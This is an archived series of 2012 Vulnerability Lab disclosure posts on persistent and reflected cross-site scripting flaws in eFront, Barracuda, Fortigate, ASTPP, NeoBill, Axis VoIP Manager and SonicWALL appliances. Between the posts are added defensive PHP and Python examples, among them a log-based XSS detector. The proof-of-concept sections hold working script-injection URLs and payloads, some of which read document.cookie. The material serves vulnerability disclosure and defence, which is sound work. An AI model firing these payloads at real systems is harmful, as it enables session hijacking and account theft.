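        if (mb_strlen($tag, 'UTF-8') > TAG_MAX_LEN
            || !preg_match('/^[\p{L}\p{N} _-]+$/u', $tag)) {
            return null;                    // reject the whole submission
        }
        $tags[] = $tag;
    }
    if (count($tags) > TAGS_MAX) {
        return null;
    }
    return array_values(array_unique($tags));
}

/** Input side for profile names (firstname / lastname): letters, space, ' - . only. */
function validate_person_name(string $raw): ?string {
    $name = trim($raw);
    if ($name === '' || mb_strlen($name, 'UTF-8') > NAME_MAX_LEN) {
        return null;
    }
    return preg_match('/^[\p{L} \'.-]+$/u', $name) ? $name : null;
}

/**
 * Output side: every stored value is entity-encoded when it is placed into HTML
 * text or an attribute, whether or not it was validated on the way in. Rows
 * stored before input validation existed are the reason this cannot be skipped.
 */
function esc_html_text(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

/** Render one row the way a user listing or tag listing page would. */
function render_listing_row(string $firstname, string $lastname, array $tags): string {
    $name = esc_html_text($firstname . ' ' . $lastname);
    $tagCells = implode(', ', array_map('esc_html_text', $tags));
    return '<tr><td>' . $name . '</td><td>' . $tagCells . '</td></tr>';
}

/** Self-check on constructed inputs; returns true when every case behaves as intended. */
function self_check(): bool {
    $ok = validate_tags('php, security , web-app,PHP') === ['php', 'security', 'web-app', 'PHP'];
    $ok = $ok && validate_tags('php,<b>x</b>') === null;          // markup in a tag is rejected
    $ok = $ok && validate_person_name("O'Brien-Smith") === "O'Brien-Smith";
    $ok = $ok && validate_person_name('Student <b>x</b>') === null;
    // A value that is already in storage is still harmless once listed:
    $row = render_listing_row('Student', '<b>name</b>', ['a&b']);
    $ok = $ok && $row === '<tr><td>Student &lt;b&gt;name&lt;/b&gt;</td><td>a&amp;b</td></tr>';
    return $ok;
}

if (PHP_SAPI === 'cli') {
    echo render_listing_row('Student', '<b>name</b>', ['a&b']), PHP_EOL;
    echo self_check() ? 'self-check passed' : 'self-check FAILED', PHP_EOL;
}
```

Input validation limits what can be stored and gives you a clean place to log rejected submissions; output encoding is the control that actually prevents the stored string from being parsed as markup, and it has to be applied at every listing that prints the field (the advisory names three affected URLs for the name fields alone).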


Proof of Concept:
=
The persistent input validation vulnerabilities can be exploited by a remote 
attacker with a privileged student account.
For demonstration or to reproduce ...


Review: Administrator - User Listing (Firstname & Lastname)

tr id=row_student class=oddRowColor 
tda 
href=http://efront.127.0.0.1:137/educational/www/administrator.php?ctg=personaluser=student;
 
class=editLinkspan id=column_studentiframe 
src=administrator.php-[PERSISTENT INJECTED SCRIPT CODE!])' = 
d.= (student)= span=/a/td

Affected URL(s):
http://efront.127.0.0.1:137/educational/www/student.php?ctg=personal&user=student&op=profile
http://efront.127.0.0.1:137/educational/www/administrator.php?ctg=users
http://efront.127.0.0.1:137/educational/www/administrator.php?ctg=personal&user=student&op=profile


Review: Messages - Add New Folder Name - Listing

td
span class=counter4./span
a href=http://efront.127.0.0.1:137/educational/www/student.php?ctg=messages;
folder=10iframe src=student-[PERSISTENT INJECTED SCRIPT CODE!])'  (0= 
messages,= 0kb)= a=
/td
td


Risk:
=
The security risk of the persistent web vulnerabilities is estimated as 
high(-).


Credits:

Vulnerability Laboratory [Research Team]  -Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)



eFront Enterprise v3.6.11 - Multiple Web Vulnerabilities

2012-09-05 Thread Vulnerability Lab
%2Fwww
%2Fvhosts%2Fdemo%2Fenterprise%2Fupload%2Ftrainee%2Fmodule_hcd%2Fpublic%2F%22%3E%3C[PERSISTENT
 INJECTED SCRIPT CODE!]');
iframe src=student-[PERSISTENT INJECTED SCRIPT CODE!])' = a=span
id = 
edit_%2Fvar%2Fwww%2Fvhosts%2Fdemo%2Fenterprise%2Fupload%2Ftrainee%2Fmodule_hcd%2Fpublic%2F%22%3E%3C[PERSISTENT
 INJECTED SCRIPT CODE!]
 style = display:noneinput type = text value = 
[PERSISTENT INJECTED SCRIPT CODE!])  onkeypress = if 
(event.which == 13 || event.keyCode == 13) 
{Element.extend(this).next().down().onclick(); return 
false;}/ a href = javascript:void(0)img id =
editImage_%2Fvar%2Fwww%2Fvhosts%2Fdemo%2Fenterprise%2Fupload%2Ftrainee%2Fmodule_hcd%2Fpublic%2F%22%3E%3C[PERSISTENT
 INJECTED SCRIPT CODE!]src
 = 'themes/default/images/others/transparent.gif' class = 'sprite16 
sprite16-success' style = vertical-align:middle onclick = 
editFile(this, 
$('span_%2Fvar%2Fwww%2Fvhosts%2Fdemo%2Fenterprise%2Fupload%2Ftrainee%2Fmodule_hcd%2Fpublic%[PERSISTENT
 INJECTED SCRIPT CODE!]').innerHTML,
 Element.extend(this).up().previous().value, 
'directory','\[PERSISTENT INJECTED SCRIPT CODE!]) ') border =
0/a/span/tdtd/td
 td27 Jul 2012, 23:38/td

URL: 
http://efront.127.0.0.1:1339/enterprise/www/student.php?ctg=personal&user=trainee&op=files



Review: PANEL Index - Write something about yourself (Only locally exploitable!)

td
span class=leftOptionTrainee D. (trainee) /span
span style= id=statusText onclick=javascript:showStatusChange()
iiframe src=student3-[PERSISTENT INJECTED SCRIPT CODE!])' = 
i=/iframe/i/span
input class=inputText id=inputStatusText style=display: none; value=
[PERSISTENT INJECTED SCRIPT CODE!];)  onblur=changeStatus()
img style=visibility: visible; progressimage=anonymous_element_16 
id=statusTextProgressImg 
src=student3-Dateien/transparent.gif class=ajaxHandle sprite32 
sprite32-edit alt=Click to change status 
title=Click to change status onclick=javascript:showStatusChange()
/td

URL: 
http://efront.127.0.0.1:1339/enterprise/www/student.php?ctg=personal&user=trainee&op=dashboard


Risk:
=
The security risk of the persistent web vulnerabilities is estimated as 
high(-).


Credits:

Vulnerability Laboratory [Research Team]  -Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)



Barracuda Web Filter 910 5.0.015 - Multiple Vulnerabilities

2012-09-05 Thread Vulnerability Lab
Title:
==
Barracuda Web Filter 910 5.0.015 - Multiple Vulnerabilities


Date:
=
2012-08-02


References:
===
http://www.vulnerability-lab.com/get_content.php?id=570

Barracuda Networks Security ID: BNSEC-279/BNYF-5533


VL-ID:
=
570


Common Vulnerability Scoring System:

4.5


Introduction:
=
The Barracuda Web Filter is an integrated content filtering, application 
blocking and malware protection 
solution that is powerful, easy to use and affordable for businesses of all 
sizes. It enforces Internet 
usage policies by blocking access to Web sites and Internet applications that 
are not related to business, 
and it easily and completely eliminates spyware and other forms of malware from 
your organization. No more 
productivity loss trying to repair computers or make computers usable again.

Blocks access to Web sites based on domain, URL pattern, or content category
Blocks downloads based on file type
Blocks applications that access the Internet, including IM, music services, and 
software update utilities
Integrates with  safe search  filters built into popular images search engines
Provides integrated gateway and desktop spyware protection
Uses Barracuda Web Security Agents compatible with Windows PC’s and Macs to 
enforce Internet policies on off-network computers

The Barracuda Web Filter combines preventative, reactive, and proactive 
measures to form a complete Web 
filtering solution. Designed for the enterprise, the Barracuda Web Filter 
enables you to set up custom policies 
for particular users and groups across customizable time ranges. The Barracuda 
Web Filter integrates with popular 
LDAP directory servers, such as Microsoft Active Directory, for both 
authentication and group membership 
information on which to apply custom policies. Sample uses of group policies 
include:

Restricting access to job board Web sites to only the Human Resources group
Defining separate policies for teachers and students at a school
Enabling compliance officers unrestricted access to the Web for investigation
Providing external instant messaging (e.g., AIM) access only to specific users 
or groups
Restricting personal Web browsing to non-working hours

For organizations that do not utilize directory servers, policies can be 
defined for unauthenticated users as a whole, 
locally defined users and groups, or network IP address ranges.

(Copy of the Vendor Homepage: 
http://www.barracudanetworks.com/ns/products/web-filter-overview.php )


Abstract:
=
The Vulnerability Lab Research Team discovered multiple Web Vulnerabilities in 
Barracuda's Web Filter Application v5.0.0.015 Appliance Model 910.


Report-Timeline:

2012-05-01: Researcher Notification & Coordination
2012-05-08: Vendor Notification
2012-06-13: Vendor Response/Feedback
2012-07-25: Vendor Fix/Patch
2012-08-02: Public or Non-Public Disclosure


Status:

Published


Affected Products:
==
Barracuda Networks
Product: Barracuda Web Filter Appliance 910 v5.0.0.015


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

Multiple persistent input validation vulnerabilities are detected in 
Barracuda's Web Filter Application v5.0.0.015 Appliance Model 910. 
The bugs allow remote attackers to inject malicious script code on 
the application side (persistent). Successful exploitation 
of the vulnerability can lead to session hijacking (manager/admin) or stable 
(persistent) context manipulation. Exploitation requires 
low user interaction. The vulnerability is located in the NTLM Edit - Host & 
Domain Name, which is bound to the affected vulnerable 
Existing Authentication Services listing. Another vulnerability is located on 
the Upload Key Tab in combination with the 
unsanitized Short Domain Name input field and its output listing.


Vulnerable Module(s):
[+] Authentication > New Authentication Service
    [-] NTLM - Server Hostname & Domain Name - Existing Authentication Services

[+] Authentication > Kerberos > Advanced Settings
    [-] Upload Key Tab File in combination with alternative Short Domain Name

Picture(s):
../1.png
../2.png


Proof of Concept:
=
The persistent web vulnerabilities can be exploited by remote attackers with 
high[-](medium+) user interaction or via a 
local low privileged user account with low required user interaction. For 
demonstration or to reproduce ...

Review: NTLM Edit & Listing

<td colspan="2" style="" valign="top" width="285"><input autocomplete="off"
id="UPDATE_ntlm_server_hostname:md5UBwQ8iCjrc1egk1wTV8SEg"
name="UPDATE_ntlm_server_hostname:md5UBwQ8iCjrc1egk1wTV8SEg" size="30" value="
[PERSISTENT SCRIPT CODE EXECUTION!]" type="text"><br><div nowrap>

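The defect pattern the Barracuda advisory describes (a stored hostname or domain name written straight into an input's value attribute in the Existing Authentication Services listing) next to its fix, as an added Python example that is not the advisory's or the vendor's code. The breakout string, the store and the function names are constructed for the demo; only the field id comes from the listing above.

```python
import html
import re

# Constructed breakout string in the style of this page's PoCs (not the advisory's
# own test string): it closes the value="" attribute and starts a new element.
BREAKOUT_PAYLOAD = '"><iframe src=a onload=alert("VLABS")><'

# RFC 1123 label: 1-63 letters, digits or hyphens, no leading/trailing hyphen.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def is_valid_hostname(name: str) -> bool:
    """Allowlist check for an NTLM server hostname or (short) domain name field.

    Hostnames and DNS/NetBIOS domain names never legitimately contain quotes,
    angle brackets or spaces, so a strict allowlist rejects markup outright.
    """
    if not name or len(name) > 253:
        return False
    return all(_LABEL.match(label) for label in name.rstrip(".").split("."))


def save_auth_service_field(store: dict, field_id: str, submitted: str) -> bool:
    """Input-side check (defense in depth): refuse to persist anything that is not a hostname."""
    if not is_valid_hostname(submitted):
        return False
    store[field_id] = submitted
    return True


def render_listing_row_vulnerable(field_id: str, stored_value: str) -> str:
    """Reproduces the defect pattern: the stored value is concatenated straight into the attribute."""
    return (
        f'<input autocomplete="off" id="{field_id}" name="{field_id}" '
        f'size="30" value="{stored_value}" type="text">'
    )


def render_listing_row_hardened(field_id: str, stored_value: str) -> str:
    """Output-encodes for the HTML attribute context, so a stored value can never close the attribute.

    This is the actual fix: it also covers records that were persisted before
    any input check existed.
    """

    def esc(text: str) -> str:
        return html.escape(text, quote=True)

    return (
        f'<input autocomplete="off" id="{esc(field_id)}" name="{esc(field_id)}" '
        f'size="30" value="{esc(stored_value)}" type="text">'
    )


def attribute_breakout(rendered_input: str) -> bool:
    """Demo check: a single rendered <input> element must contain exactly one tag opener."""
    return rendered_input.count("<") != 1


if __name__ == "__main__":
    field = "UPDATE_ntlm_server_hostname"  # field id taken from the advisory's listing
    store = {}
    print("legit hostname accepted:", save_auth_service_field(store, field, "dc01.corp.example"))
    print("breakout string accepted:", save_auth_service_field(store, field, BREAKOUT_PAYLOAD))
    # Assume the payload reached the store anyway (saved before the input check existed).
    store[field] = BREAKOUT_PAYLOAD
    print("vulnerable listing breaks out:", attribute_breakout(render_listing_row_vulnerable(field, store[field])))
    print("hardened listing breaks out:", attribute_breakout(render_listing_row_hardened(field, store[field])))
```
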
Knowledge Base EE v4.62.0 - SQL Injection Vulnerability

2012-09-13 Thread Vulnerability Lab
Copyright © 2012 | Vulnerability 
Laboratory



-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com




Fortigate UTM WAF Appliance - Multiple Web Vulnerabilities

2012-09-13 Thread Vulnerability Lab
Title:
==
Fortigate UTM WAF Appliance - Multiple Web Vulnerabilities


Date:
=
2012-09-06


References:
===
http://www.vulnerability-lab.com/get_content.php?id=557


VL-ID:
=
557


Common Vulnerability Scoring System:

5


Introduction:
=
The FortiGate series of multi-threat security systems detect and eliminate the 
most damaging, content-based threats from email 
and Web traffic such as viruses, worms, intrusions, inappropriate Web content 
and more in real time - without degrading 
network performance.

Ranging from the FortiGate-30 series for small offices to the FortiGate-5000 
series for large enterprises, service providers and 
carriers, the FortiGate line combines the FortiOS™ security operating system 
with FortiASIC processors and other hardware to provide 
a comprehensive and high-performance array of security and networking functions 
including:

* Firewall, VPN, and Traffic Shaping
* Intrusion Prevention System (IPS)
* Antivirus/Antispyware/Antimalware
* Web Filtering
* Antispam
* Application Control (e.g., IM and P2P)
* VoIP Support (H.323. and SCCP)
* Layer 2/3 routing
* Multiple WAN interface options

FortiGate appliances provide cost-effective, comprehensive protection against 
network, content, and application-level threats - including 
complex attacks favored by cybercriminals - without degrading network 
availability and uptime. FortiGate platforms incorporate sophisticated 
networking features, such as high availability (active/active, active/passive) 
for maximum network uptime, and virtual domain (VDOM) 
capabilities to separate various networks requiring different security policies.

Since 2009 the Fortigate appliance series has been certified by the U.S. Army and 
is now listed in the 
Information Assurance Approved Products List (IA APL). The military applies 
high security 
standards to secure outdoor camps, air bases and offices with Fortigate hardware.

(Copy from the Vendor Homepage: http://www.fortinet.com/products/fortigate )


Abstract:
=
Vulnerability-Lab Research Team discovered multiple persistent Web 
Vulnerabilities in the FortiGate UTM Appliance Application.


Report-Timeline:

2012-05-06: Researcher Notification & Coordination
2012-05-10: Vendor Notification
2012-06-11: Vendor Response/Feedback
2012-08-25: Vendor Fix/Patch (Fixed in FortiOS v4.3.8 B0537 & Fixed in 
FortiOS v5.0)
2012-09-06: Public or Non-Public Disclosure


Status:

Published


Affected Products:
==
Fortigate
Product: UTM Appliance Application vFortiGate-5000 Series;FortiGate-3950 
Series;FortiGate-3810A;


Exploitation-Technique:
===
Remote


Severity:
=
High


Details:

Multiple input validation vulnerabilities (persistent) are detected in the 
FortiGate UTM Appliance Application. Remote attackers 
& low privileged user accounts can inject (persistent) own malicious script 
code to manipulate specific customer/admin requests. 
The vulnerability allows a local low privileged attacker to manipulate the 
appliance (application) via persistent script code 
injection. The vulnerability is located in the Add or Tags module category listing 
with the bound vulnerable applied tags & tags display parameters.
Successful exploitation results in content module request manipulation, 
execution of persistent malicious script code, session 
hijacking, account steal & persistent phishing.

Vulnerable Module(s): (Persistent)
[+] Tags - Applied tags 
[+] Add - Tags Display


Interface - UTM WAF Web Application [Appliance]
FortiGate-5000 Series;FortiGate-3950 
Series;FortiGate-3810A;FortiGate-3600A;FortiGate-3016B;FortiGate-1240B
FortiGate-800;FortiGate-620B;FortiGate-311B;FortiGate-310B;FortiGate-300A;FortiGate-224B;FortiGate-200B
 Series


Proof of Concept:
=
The persistent vulnerabilities can be exploited by remote attackers with low 
required user interaction or a low 
privileged user account. For demonstration or to reproduce ...


Code Review: Tags - Applied tags [Box] & Listing
URL:
http://appliance.127.0.0.1:1337/firewall/policy/policy6?expanded=#

<form name="addr_dlg" action="/firewall/address/add" onsubmit="if
(!fwad_form_check('Please choose one address/group.',
'Please choose one interface to connect.')) return false; if
(document.forms[0].submitFlag) return false; document.forms[0].
submitFlag = true;">
<table><tbody><tr>
<td align="left" width="150"><nobr>Address Name</nobr></td>
<td align="left"><input
name="name" size="64" maxlength="63" value="all" type="text">
</td>
</tr>
<tr>
<td>Color</td>
<td><span colorclassprefix="addr_ipv6_
" class="icon_fw addr_ipv6_13" id="addressIcon"></span> <a href="#"
id="addressColor" cscolorvalue="0">[Change]</a><input value="13"
name="csColor1" type

ASTPP VoIP Billing (4cf207a) - Multiple Web Vulnerabilities

2012-09-17 Thread Vulnerability Lab
<div style="text-align: center; width: 70px; white-space: normal;">daily</div></div></td><td align="center"><div
style="text-align: center; width: 50px; white-space: normal;"><div style="text-align: center; width: 50px; white-space:
normal;">No</div></div></td><td align="center">
<div style="text-align: center; width: 90px; white-space: normal;"><div
style="text-align: center; width: 90px; white-space:
normal;">Customer</div></div></td><td align="center"><div style="text-align:
center; width: 90px; white-space: normal;">
<div style="text-align: center; width: 90px; white-space:
normal;">Active</div></div></td><td align="center"><div style="text-align:
center; width: 120px; white-space: normal;"><div style="text-align: center;
width: 120px; white-space:
normal;"><a
href="http://demo.astpp.org/accounts/payment_process/asdsadfas%20;[PERSISTENT
INJECTED SCRIPT CODE]= ="
class="icon"
style="text-decoration:none;background-image:url(/images/payment.png);"
rel="facebox" title="ProcessPayment">
&amp;nbsp;&lt;/a&gt;&lt;a
href="http://demo.astpp.org/accounts/account_detail/asdsadfas


Review: DIDs

<li>
<label class="desc">Access Number:</label>
<input name="access_number" class="text field medium" size="20"
readonly="readonly"
type="text">[PERSISTENT INJECTED SCRIPT CODE]@108.163.242.106=</iframe>
  <input name="id" value="11" type="hidden">
  </li>
<li>
<label class="desc">Note:</label>
<input name="note" class="text field medium" size="10"
type="text">[PERSISTENT INJECTED SCRIPT CODE])' =</iframe>
</li>
<li>
  <label class="desc">Status:</label>
  <select name="status" class="select field medium">
<option value="0" selected="selected">ACTIVE</option>
<option value="1">INACTIVE</option>
  </select>


Review: Trunks

<td align="center"><div style="text-align: center; width: 329px; white-space:
normal;">
<a href="http://demo.astpp.org/lcr/trunks/edit/;[PERSISTENT INJECTED SCRIPT
CODE]'" class="icon" style="
text-decoration:none;background-image:url(/images/page_edit.png);"
rel="facebox" title="Update"></a><a
 href="/lcr/trunks/delete/<iframe src=a onload=alert(/"
 class="icon"
style="text-decoration:none;background-image:url(/images/delete.png);"
title="Delete" onClick="return
get_alert_msg();"></a></iframe></a></div></td></tr></tbody></table>
<div style="display: none;" class="iDiv"></div></div>


Review: Taxes

<fieldset style="width:585px;">
<legend><span style="font-size:14px; font-weight:bold;
color:#000;">Taxes Information</span></legend>
<li>
<label class="desc">Priority:</label><input class="text field
medium" value="0" name="taxes_priority" size="20" type="text">
</li>
<li>
<label class="desc">Amount:</label><input class="text field medium"
value="0." name="taxes_amount" size="20" type="text">
</li>
<li>
<label class="desc">Rate(%):</label>
<input class="text field medium" value="0." name="taxes_rate"
size="8" type="text">
</li>
<li>
<label class="desc">Description:</label>
<input class="text field medium" type="text">[PERSISTENT INJECTED
SCRIPT CODE])' = name="taxes_description" size="8"</iframe>
</li>
</fieldset>


Risk:
=
The security risk of the persistent web vulnerabilities is estimated as 
high(-).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)



NeoBill CMS v0.8 Alpha - Multiple Web Vulnerabilities

2012-09-17 Thread Vulnerability Lab
://vuln-lab.com%20onload=alert%28%22VLABS%22%29%20%3C
neobill.127.0.0.1:1339/neobill/manager/manager_content.php?page=view_log_%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VLABS%22%29%20%3C&log=1

Search:
neobill.127.0.0.1:1339/neobill/manager/manager_content.php?page=services_servers&submit=search_%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VLABS%22%29%20%3C

Register Domain:
neobill.127.0.0.1:1339/neobill/manager/manager_content.php?page=domains_register&submit=register_%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VLABS%22%29%20%3C


New Domain Service:
neobill.127.0.0.1:1339/neobill/manager/manager_content.php?page=services_new_domain_service&submit=new_%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VLABS%22%29%20%3C


Risk:
=
1.1
The security risk of the persistent input validation vulnerability is estimated 
as high.

1.2
The security risk of the non-persistent cross site scripting vulnerabilities 
is estimated as low(+)|(-)medium.


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)






Axis VoIP Manager v2.1.5.7 - Multiple Web Vulnerabilities

2012-09-18 Thread Vulnerability Lab
Title:
==
Axis VoIP Manager v2.1.5.7 - Multiple Web Vulnerabilities


Date:
=
2012-09-09


References:
===
http://www.vulnerability-lab.com/get_content.php?id=686


VL-ID:
=
686


Common Vulnerability Scoring System:

2.3


Introduction:
=
Feel free to create Schedules (in PBX Features), Inbound Routes & User 
Extensions (individually or using the 
Bulk Generator in Extensions & Directory), Feature Dial Codes (in PBX Features 
- Feature Dial Codes), 
IVR Menus (in PBX Features), ACD Queues, etc.

(Copy of the Vendor Homepage: http://www.axint.net/voip/ )


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple cross site 
scripting vulnerabilities in the Axis VoIP Manager v2.1.5.7.


Report-Timeline:

2011-09-07: Public Disclosure


Status:

Unpublished


Affected Products:
==
Axis
Product: VoIP Manager v2.1.5.7


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

Multiple non-persistent cross site scripting vulnerabilities are detected in 
the Axis VoIP Manager User Portal v2.1.5.7.
The vulnerability allows remote attackers to hijack website customer, 
moderator or admin sessions with medium or high 
required user interaction. The bugs are located on the client side in the 
contact_chooser.cgi and contacts.cgi files with the 
bound vulnerable lastname, firstname, department, contact or managed_usr 
application parameters. Successful exploitation 
results in application account steal, client side phishing & client-side content 
request manipulation. Exploitation requires 
medium or high user interaction & does not require a privileged web application 
user account.

Vulnerable Module(s):
[+] contact_chooser.cgi
[+] contacts.cgi

Vulnerable Parameter(s):
[+] lastname, firstname & department
[+] contact
[+] managed_usr


Proof of Concept:
=
The client side cross site scripting vulnerabilities can be exploited by remote 
attackers with medium or high required 
user interaction and without a privileged application user account. For 
demonstration or to reproduce ...

Selection Filter

https://voip01.127.0.0.1:5999/asterisk/contacts.cgi?usr=demo-100&type=1&type_selector=2&lastname=&lastname_match=1&firstname=&firstname_match=1&department=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C&department_match=1&action=Select


https://voip01.127.0.0.1:5999/asterisk/contacts.cgi?usr=demo-100&type=1&type_selector=2&lastname=&lastname_match=1&firstname=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C&firstname_match=1&department=&department_match=1&action=Select

https://voip01.127.0.0.1:5999/asterisk/contacts.cgi?usr=demo-100&type=1&type_selector=2&lastname=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C&lastname_match=1&firstname=&firstname_match=1&department=&department_match=1&action=Select


Contact Chooser

https://voip01.127.0.0.1:5999/asterisk/contact_chooser.cgi?contact=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C


managed_usr - listing

https://voip01.127.0.0.1:5999/asterisk/contacts.cgi?type=2&usr=demo-100&managed_usr=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C&type_selector=2&lastname=&lastname_match=1&firstname=&firstname_match=1&department=&department_match=1&action=Select+


Risk:
=
The security risk of the non-persistent (client side) cross site scripting 
vulnerabilities is estimated as low(+)|(-)medium.


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)



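A log-side detection for the reflected (client-side) pattern used in the Axis VoIP Manager PoCs above, as an added Python example that is not part of any post in this thread. The access-log lines are constructed for the demo; the decoder generalises beyond the Axis URLs in that it also strips the double percent-encoding (%253c) used in the SonicWALL PoCs further down.

```python
from __future__ import annotations

import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed common-log-format lines (no real hosts). The query strings follow
# the shape of the PoC URLs in this thread; line 3 is double percent-encoded.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Sep/2012:10:01:02 +0200] "GET /asterisk/contacts.cgi?usr=demo-100&type=1&lastname=smith&action=Select HTTP/1.1" 200 1833
10.0.0.9 - - [18/Sep/2012:10:01:09 +0200] "GET /asterisk/contacts.cgi?usr=demo-100&department=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C&action=Select HTTP/1.1" 200 1901
10.0.0.9 - - [18/Sep/2012:10:02:15 +0200] "GET /alert_history.html?from=200%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c HTTP/1.1" 200 5120
10.0.0.7 - - [18/Sep/2012:10:03:00 +0200] "GET /asterisk/contact_chooser.cgi?contact=O%27Brien%20%3C3 HTTP/1.1" 200 700
"""

_REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# A tag opener carrying an inline event handler (the iframe/onload pattern used
# throughout these PoCs), a <script> tag, or a javascript: URL. Matched only
# against fully decoded parameter values, so extra encoding layers do not hide it.
_MARKUP = re.compile(
    r"<\s*[a-z][a-z0-9]*[^>]*?\bon[a-z]+\s*=|<\s*script\b|javascript\s*:", re.I
)


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Strip repeated percent-encoding layers until the value stops changing."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(target: str) -> list[tuple[str, str]]:
    """Return (name, decoded value) for every query parameter that carries markup."""
    hits = []
    # parse_qsl already removes one encoding layer; fully_decode handles the rest.
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = fully_decode(raw)
        if _MARKUP.search(decoded):
            hits.append((name, decoded))
    return hits


def scan_log(text: str) -> list[dict]:
    """Run the check over common-log-format lines; one finding per flagged request."""
    findings = []
    for line in text.splitlines():
        match = _REQUEST.search(line)
        if not match:
            continue
        hits = suspicious_params(match.group("target"))
        if hits:
            findings.append({
                "client": line.split(" ", 1)[0],
                "path": urlsplit(match.group("target")).path,
                "params": hits,
            })
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["client"], finding["path"])
        for name, value in finding["params"]:
            print("   ", name, "=", value)
```

A benign value such as `O'Brien <3` is not flagged, because the match requires a tag name and an event handler (or a script tag or javascript: scheme), not just an angle bracket.
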
SonicWALL EMail Security 7.3.5 - Multiple Vulnerabilities

2012-09-18 Thread Vulnerability Lab
<input type="text" name="safeModeNoOfQuarantine" size="3"
value="<iframe src=a
[EXECUTE/INJECT PERSISTENT CODE!])"
id="safeModeNoOfQuarantine">

... or

<input type="text"
name="safeModeNoOfMessageFromOneUser" size="3"
value="<iframe src=a
[EXECUTE/INJECT PERSISTENT CODE!])"
id="safeModeNoOfMessageFromOneUser">


URL:http://esserver.127.0.0.1:8080/virus_config.html




PoC: Compliance Module - Approval Ordner - Listing & Exceptions

<tbody><tr><td
background="policy_approval_box_summary-Dateien/nav_bar_background.gif"
width="24">
<img src="policy_approval_box_summary-Dateien/clear.gif" height="15"
width="4"></td><td border="0"
background="policy_approval_box_summary-Dateien/nav_bar_background.gif"><span
class="column">Approval-Ordner</span></td><td border="0"
background="policy_approval_box_summary-Dateien/nav_bar_background.gif">
<span class="column">Nachrichten, die eine Genehmigung erfordern</span></td><td
background="policy_approval_box_summary-Dateien/nav_bar_background.gif"></td></tr><tr>
<td height="12"></td>
<td><a href="http://esserver.demo.sonicwall.com/policy_approval_box.html
?pathname=[INJECTED PERSISTENT CODE!]<iframe src="policy_approval_box_
summary-Dateien/a.htm" [EXECUTION OF PERSISTENT CODE!] = a=</td>
<td>0</td>
<td><div
 align="right"><input type="button" name="delete" class="button"
value="Löschen"


URL: http://esserver.127.0.0.1:8080/policy_approval_box_summary.html



1.2
The client side cross site scripting vulnerability can be exploited by remote 
attackers with medium required user interaction.
For demonstration or to reproduce ...

PoC:

http://esserver.127.0.0.1:8080/alert_history.html?from=200%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c
http://esserver.127.0.0.1:8080/alert_history.html[POST 
REQUEST]row=200%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c
http://esserver.127.0.0.1:8080/policy_approval_box.html?pathname=%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c


Solution:
=
The Email Security 7.3.6 patch that addresses this set of issues has now been 
posted and is available to all of our Email Security customers 
from the download section of our customer portal 
(https://www.mysonicwall.com/Firmware/DownloadCenter.aspx). 


Risk:
=
1.1
The security risk of the persistent input validation vulnerabilities is 
estimated as high(-).

1.2
The security risk of the client side cross site scripting vulnerabilities is 
estimated as low(+).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)






Fortigate UTM WAF Appliance - Multiple Web Vulnerabilities

2012-09-18 Thread Vulnerability Lab

Fortigate UTM WAF Appliance - Cross Site Vulnerabilities

2012-09-18 Thread Vulnerability Lab
Title:
==
Fortigate UTM WAF Appliance - Cross Site Vulnerabilities


Date:
=
2012-09-07


References:
===
http://www.vulnerability-lab.com/get_content.php?id=559


VL-ID:
=
559


Common Vulnerability Scoring System:

3.5


Introduction:
=
The FortiGate series of multi-threat security systems detect and eliminate the 
most damaging, content-based threats from email 
and Web traffic such as viruses, worms, intrusions, inappropriate Web content 
and more in real time - without degrading 
network performance.

Ranging from the FortiGate-30 series for small offices to the FortiGate-5000 
series for large enterprises, service providers and 
carriers, the FortiGate line combines the FortiOS™ security operating system 
with FortiASIC processors and other hardware to provide 
a comprehensive and high-performance array of security and networking functions 
including:

* Firewall, VPN, and Traffic Shaping
* Intrusion Prevention System (IPS)
* Antivirus/Antispyware/Antimalware
* Web Filtering
* Antispam
* Application Control (e.g., IM and P2P)
* VoIP Support (H.323. and SCCP)
* Layer 2/3 routing
* Multiple WAN interface options

FortiGate appliances provide cost-effective, comprehensive protection against 
network, content, and application-level threats - including 
complex attacks favored by cybercriminals - without degrading network 
availability and uptime. FortiGate platforms incorporate sophisticated 
